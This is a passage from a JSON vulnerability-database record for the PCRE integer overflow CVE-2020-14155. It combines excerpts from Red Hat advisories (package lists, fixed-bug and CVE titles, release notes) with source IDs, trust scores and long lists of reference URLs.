fo-8.42-6.el8.s390x.rpm\npcre-utf16-8.42-6.el8.s390x.rpm\npcre-utf16-debuginfo-8.42-6.el8.s390x.rpm\npcre-utf32-8.42-6.el8.s390x.rpm\npcre-utf32-debuginfo-8.42-6.el8.s390x.rpm\n\nx86_64:\npcre-8.42-6.el8.i686.rpm\npcre-8.42-6.el8.x86_64.rpm\npcre-cpp-8.42-6.el8.i686.rpm\npcre-cpp-8.42-6.el8.x86_64.rpm\npcre-cpp-debuginfo-8.42-6.el8.i686.rpm\npcre-cpp-debuginfo-8.42-6.el8.x86_64.rpm\npcre-debuginfo-8.42-6.el8.i686.rpm\npcre-debuginfo-8.42-6.el8.x86_64.rpm\npcre-debugsource-8.42-6.el8.i686.rpm\npcre-debugsource-8.42-6.el8.x86_64.rpm\npcre-devel-8.42-6.el8.i686.rpm\npcre-devel-8.42-6.el8.x86_64.rpm\npcre-tools-debuginfo-8.42-6.el8.i686.rpm\npcre-tools-debuginfo-8.42-6.el8.x86_64.rpm\npcre-utf16-8.42-6.el8.i686.rpm\npcre-utf16-8.42-6.el8.x86_64.rpm\npcre-utf16-debuginfo-8.42-6.el8.i686.rpm\npcre-utf16-debuginfo-8.42-6.el8.x86_64.rpm\npcre-utf32-8.42-6.el8.i686.rpm\npcre-utf32-8.42-6.el8.x86_64.rpm\npcre-utf32-debuginfo-8.42-6.el8.i686.rpm\npcre-utf32-debuginfo-8.42-6.el8.x86_64.rpm\n\nRed Hat Enterprise Linux CRB (v. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.6.3 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2019088 - \"MigrationController\" CR displays syntax error when unquiescing applications\n2021666 - Route name longer than 63 characters causes direct volume migration to fail\n2021668 - \"MigrationController\" CR ignores the \"cluster_subdomain\" value for direct volume migration routes\n2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)\n2024966 - Manifests not used by Operator Lifecycle Manager must be removed from the MTC 1.6 Operator image\n2027196 - \"migration-controller\" pod goes into \"CrashLoopBackoff\" state if an invalid registry route is entered on the \"Clusters\" page of the web console\n2027382 - \"Copy oc describe/oc logs\" window does not close automatically after timeout\n2028841 - \"rsync-client\" container fails during direct volume migration with \"Address family not supported by protocol\" error\n2031793 - \"migration-controller\" pod goes into \"CrashLoopBackOff\" state if \"MigPlan\" CR contains an invalid \"includedResources\" resource\n2039852 - \"migration-controller\" pod goes into \"CrashLoopBackOff\" state if \"MigPlan\" CR contains an invalid \"destMigClusterRef\" or \"srcMigClusterRef\"\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic\n1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet\n1997017 - unprivileged client fails to get guest agent data\n1998855 - Node drain: Sometimes source virt-launcher pod status is Failed and not Completed\n2000251 - RoleBinding and ClusterRoleBinding brought in by kubevirt does not get reconciled when kind is ServiceAccount\n2001270 - [VMIO] [Warm from Vmware] Snapshot files are not deleted after Successful Import\n2001281 - [VMIO] [Warm from VMware] Source VM should not be turned ON if vmio import is removed\n2001901 - [4.8.3] NNCP creation failures after nmstate-handler pod deletion\n2007336 - 4.8.3 containers\n2007776 - Failed to Migrate Windows VM with CDROM (readonly)\n2008511 - [CNV-4.8.3] VMI is in LiveMigrate loop when Upgrading Cluster from 2.6.7/4.7.32 to OCP 4.8.13\n2012890 - With descheduler during multiple VMIs migrations, some VMs are restarted\n2025475 - [4.8.3] Upgrade from 2.6 to 4.x versions failed due to vlan-filtering issues\n2026881 - [4.8.3] vlan-filtering is getting applied on veth ports\n\n5. Description:\n\nThe release of RHACS 3.67 provides the following new features, bug fixes,\nsecurity patches and system changes:\n\nOpenShift Dedicated support\n\nRHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on\nAmazon Web Services and Google Cloud Platform. Use OpenShift OAuth server as an identity provider\nIf you are using RHACS with OpenShift, you can now configure the built-in\nOpenShift OAuth server as an identity provider for RHACS. Enhancements for CI outputs\nRed Hat has improved the usability of RHACS CI integrations. CI outputs now\nshow additional detailed information about the vulnerabilities and the\nsecurity policies responsible for broken builds. Runtime Class policy criteria\nUsers can now use RHACS to define the container runtime configuration that\nmay be used to run a pod\u2019s containers using the Runtime Class policy\ncriteria. \n\nBug Fixes\nThe release of RHACS 3.67 includes the following bug fixes:\n\n1. Previously, when using RHACS with the Compliance Operator integration,\nRHACS did not respect or populate Compliance Operator TailoredProfiles. \nThis has been fixed. Previously, the Alpine Linux package manager (APK) in Image policy\nlooked for the presence of apk package in the image rather than the\napk-tools package. This issue has been fixed. \n\nSystem changes\nThe release of RHACS 3.67 includes the following system changes:\n\n1. Scanner now identifies vulnerabilities in Ubuntu 21.10 images. The Port exposure method policy criteria now include route as an\nexposure method. The OpenShift: Kubeadmin Secret Accessed security policy now allows the\nOpenShift Compliance Operator to check for the existence of the Kubeadmin\nsecret without creating a violation. The OpenShift Compliance Operator integration now supports using\nTailoredProfiles. The RHACS Jenkins plugin now provides additional security information. When you enable the environment variable ROX_NETWORK_ACCESS_LOG for\nCentral, the logs contain the Request URI and X-Forwarded-For header\nvalues. The default uid:gid pair for the Scanner image is now 65534:65534. RHACS adds a new default Scope Manager role that includes minimum\npermissions to create and modify access scopes. In addition to manually uploading vulnerability definitions in offline\nmode, you can now upload definitions in online mode. You can now format the output of the following roxctl CLI commands in\ntable, csv, or JSON format: image scan, image check \u0026 deployment check\n12. You can now use a regular expression for the deployment name while\nspecifying policy exclusions\n\n3. Solution:\n\nTo take advantage of these new features, fixes and changes, please upgrade\nRed Hat Advanced Cluster Security for Kubernetes to version 3.67. Bugs fixed (https://bugzilla.redhat.com/):\n\n1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n1978144 - CVE-2021-32690 helm: information disclosure vulnerability\n1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet\n1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function\n2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability\n2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196)\n2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nRHACS-65 - Release RHACS 3.67.0\n\n6. In addition to persistent storage, Red Hat\nOpenShift Container Storage provides a multicloud data management service\nwith an S3 compatible API. \n\nBug Fix(es):\n\n* Previously, when the namespace store target was deleted, no alert was\nsent to the namespace bucket because of an issue in calculating the\nnamespace bucket health. With this update, the issue in calculating the\nnamespace bucket health is fixed and alerts are triggered as expected. \n(BZ#1993873)\n\n* Previously, the Multicloud Object Gateway (MCG) components performed\nslowly and there was a lot of pressure on the MCG components due to\nnon-optimized database queries. With this update the non-optimized\ndatabase queries are fixed which reduces the compute resources and time\ntaken for queries. Bugs fixed (https://bugzilla.redhat.com/):\n\n1993873 - [4.8.z clone] Alert NooBaaNamespaceBucketErrorState is not triggered when namespacestore\u0027s target bucket is deleted\n2006958 - CVE-2020-26301 nodejs-ssh2: Command injection by calling vulnerable method with untrusted input\n\n5. Description:\n\nThis release adds the new Apache HTTP Server 2.4.37 Service Pack 10\npackages that are part of the JBoss Core Services offering. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-14155"
},
{
"db": "VULHUB",
"id": "VHN-167005"
},
{
"db": "PACKETSTORM",
"id": "168042"
},
{
"db": "PACKETSTORM",
"id": "164825"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "164927"
},
{
"db": "PACKETSTORM",
"id": "165862"
}
],
"trust": 1.71
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-167005",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-167005"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-14155",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "165135",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165096",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165862",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165631",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "164927",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165129",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "164825",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "161245",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168352",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165099",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166051",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167956",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166308",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165286",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "160545",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168392",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166489",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164967",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165002",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165758",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167206",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168036",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165209",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1036",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.3905",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4019",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.4082",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4060",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3935",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3977",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1071",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3781",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0394",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4172",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4059",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3821",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1677",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2265",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3864",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0716",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4254",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4229",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4601",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1837",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0245",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0349",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0493",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4568",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2722",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4060.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4095",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2430",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3586",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "166789",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051846",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021111102",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042257",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051733",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "48066",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2020-53121",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165296",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164928",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165287",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165288",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166309",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-167005",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168042",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-167005"
},
{
"db": "PACKETSTORM",
"id": "168042"
},
{
"db": "PACKETSTORM",
"id": "164825"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "164927"
},
{
"db": "PACKETSTORM",
"id": "165862"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
},
{
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"id": "VAR-202006-0222",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-167005"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:42:24.486000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "PCRE Enter the fix for the verification error vulnerability",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=122998"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-190",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-167005"
},
{
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20221028-0010/"
},
{
"trust": 1.7,
"url": "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht211931"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht212147"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2020/dec/32"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2021/feb/14"
},
{
"trust": 1.7,
"url": "https://bugs.gentoo.org/717920"
},
{
"trust": 1.7,
"url": "https://www.pcre.org/original/changelog.txt"
},
{
"trust": 1.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3cdev.mina.apache.org%3e"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.8,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3cdev.mina.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0245"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3905"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0349/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165862/red-hat-security-advisory-2022-0434-05.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165631/red-hat-security-advisory-2022-0202-04.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0716"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-wmlce-libpcre-in-pcre-before-8-44-allows-an-integer-overflow/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2430"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/pcre-integer-overflow-via-large-number-after-substring-36752"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168352/red-hat-security-advisory-2022-6429-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166489/red-hat-security-advisory-2022-1081-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164825/red-hat-security-advisory-2021-4373-04.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0394"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.4082"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165286/red-hat-security-advisory-2021-5128-06.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042257"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4059"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/160545/apple-security-advisory-2020-12-14-4.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166789/red-hat-security-advisory-2022-1396-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4254"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4095"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4172"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1837"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-pcre-affects-ibm-sql-extensions-toolkit-for-nps/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167206/ubuntu-security-notice-usn-5425-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1677"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3977"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164927/red-hat-security-advisory-2021-4614-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167956/red-hat-security-advisory-2022-5840-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4060/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1071"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4019"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2265/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/apple-macos-11-multiple-vulnerabilities-33899"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2722/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48066"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165135/red-hat-security-advisory-2021-4914-06.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4060.2/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165129/red-hat-security-advisory-2021-4902-06.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165209/red-hat-security-advisory-2021-5038-04.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3821"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051846"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021111102"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165096/red-hat-security-advisory-2021-4845-05.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0493"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3935"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161245/apple-security-advisory-2021-02-01-1.html"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht212147"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht211931"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4229"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168392/red-hat-security-advisory-2022-6526-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165002/red-hat-security-advisory-2021-4032-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165099/red-hat-security-advisory-2021-4848-07.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166051/red-hat-security-advisory-2022-0580-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3781"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3864"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168036/red-hat-security-advisory-2022-5070-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165758/red-hat-security-advisory-2022-0318-06.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3586"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166308/red-hat-security-advisory-2022-0842-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164967/red-hat-security-advisory-2021-4627-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051733"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4568"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4601"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20266"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-29923"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
},
{
